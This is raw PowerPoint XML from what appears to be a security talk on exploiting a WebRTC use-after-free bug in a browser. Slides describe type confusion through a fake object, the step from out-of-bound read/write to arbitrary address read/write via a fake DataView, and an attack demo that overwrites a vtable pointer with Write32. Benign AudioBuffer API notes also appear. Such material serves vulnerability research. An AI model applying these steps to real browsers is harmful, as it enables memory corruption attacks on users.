                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CB9CAA-6EB1-4781-AB03-F2FB0756925B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16671187" y="7150166"/>
              <a:ext cx="8328633" cy="3839175"/>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pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> occupying success, the subsequent execution of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>setRemoteCandidates</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> will cause the type confusion caused by the fake object, so that the segment head of the integer array object behind the fake object points to the fake object.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="直接箭头连接符 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4834F08E-12E6-404B-BCD5-1569020D1114}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15932810" y="8806408"/>
              <a:ext cx="738378" cy="1"/>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6" name="矩形 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{228DA816-A23F-4044-9F96-D2616DC42B03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3643928" y="11222473"/>
              <a:ext cx="9118069" cy="2507158"/>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pPr lvl="0" defTabSz="914400">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Transform the fake object into a segment with a large size and length, so that the following integer array object has the ability to read and write out of bound</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="57" name="直接箭头连接符 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FA6651-4F87-4F4D-913B-6B8B86F1AE37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="887117" y="12476052"/>
              <a:ext cx="2756811"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58" name="矩形 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C09B8E-8661-4635-992A-805948E42164}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13922578" y="11222472"/>
              <a:ext cx="10305273" cy="2368120"/>
            </a:xfrm>
            <a:prstGeom prst="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square" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Iterate through all the integer arrays to find the one that can be read and written out of bound, and then create a fake </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DataView</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> object in the memory area to achieve arbitrary address reading and writing.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="59" name="直接箭头连接符 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C6FDEC-98E4-43BE-8B2F-357D5749584E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="56" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12761998" y="12476052"/>
              <a:ext cx="1278268" cy="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3612093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WebRTC Parameters UAF Exploitation : From Out of Bound R/W to Arbitrary Address R/W</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7447D5D4-8C64-4358-86F9-3DB1152611DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="4631903"/>
            <a:ext cx="10953455" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From Out of Bound R/W to Arbitrary Address R/W</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Through a series of tricks, we ended up turning a UAF vulnerability into a relative address read and write vulnerability that crossed the integer array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To achieve arbitrary address reading and writing, please refer to 《1-Day Browser &amp; Kernel Exploitation》, the idea is to fake a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object on the controllable memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://powerofcommunity.net/poc2017/andrew.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6338035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DC501863-BE68-4C7B-9EA6-BDBE7ACA7D18}"/>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05</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WebRTC Parameters UAF Exploitation : Attack Demo</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1960F45C-ECBB-4C30-BF26-74C5D948E8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="5722935" cy="3621507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EE13BF-971C-42FA-BCCA-1001FF558DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6801060" y="2550693"/>
            <a:ext cx="5153810" cy="764007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEBACB1D-4713-4B9C-913C-103CCC82F2FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6801060" y="5380790"/>
            <a:ext cx="5153810" cy="791409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC2BBF5-6021-459C-A3A3-F0D985BC7797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889482" y="3951129"/>
            <a:ext cx="5153811" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fake_obj_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 0x51515151);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD907DC-F496-4DA0-9237-EAD4C766A82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="7821350"/>
            <a:ext cx="10965168" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>In the screenshot, the leaked address is belong to the fake object. Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> change the lower 4 bits of the virtual table pointer of the fake object to 0x51515151.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417014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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6A2AFE6-C796-4568-AD10-508E132FDE21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myctx</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new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AudioContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AudioContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myctx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf</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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myctx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>createBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1, 0x25, 22050);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the number of audio channels is 1, the frame length is 0x25, and the baud rate is 22050.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var t</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lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.getChannelData</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Returns a Float32Array named t with channel PCM data and 0 for the first channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(t2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944802" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Copy the sample from the specified channel of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the target array t2, the first 0 is channel 1, and the second 0 is the copy data. The optional offset is 0.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
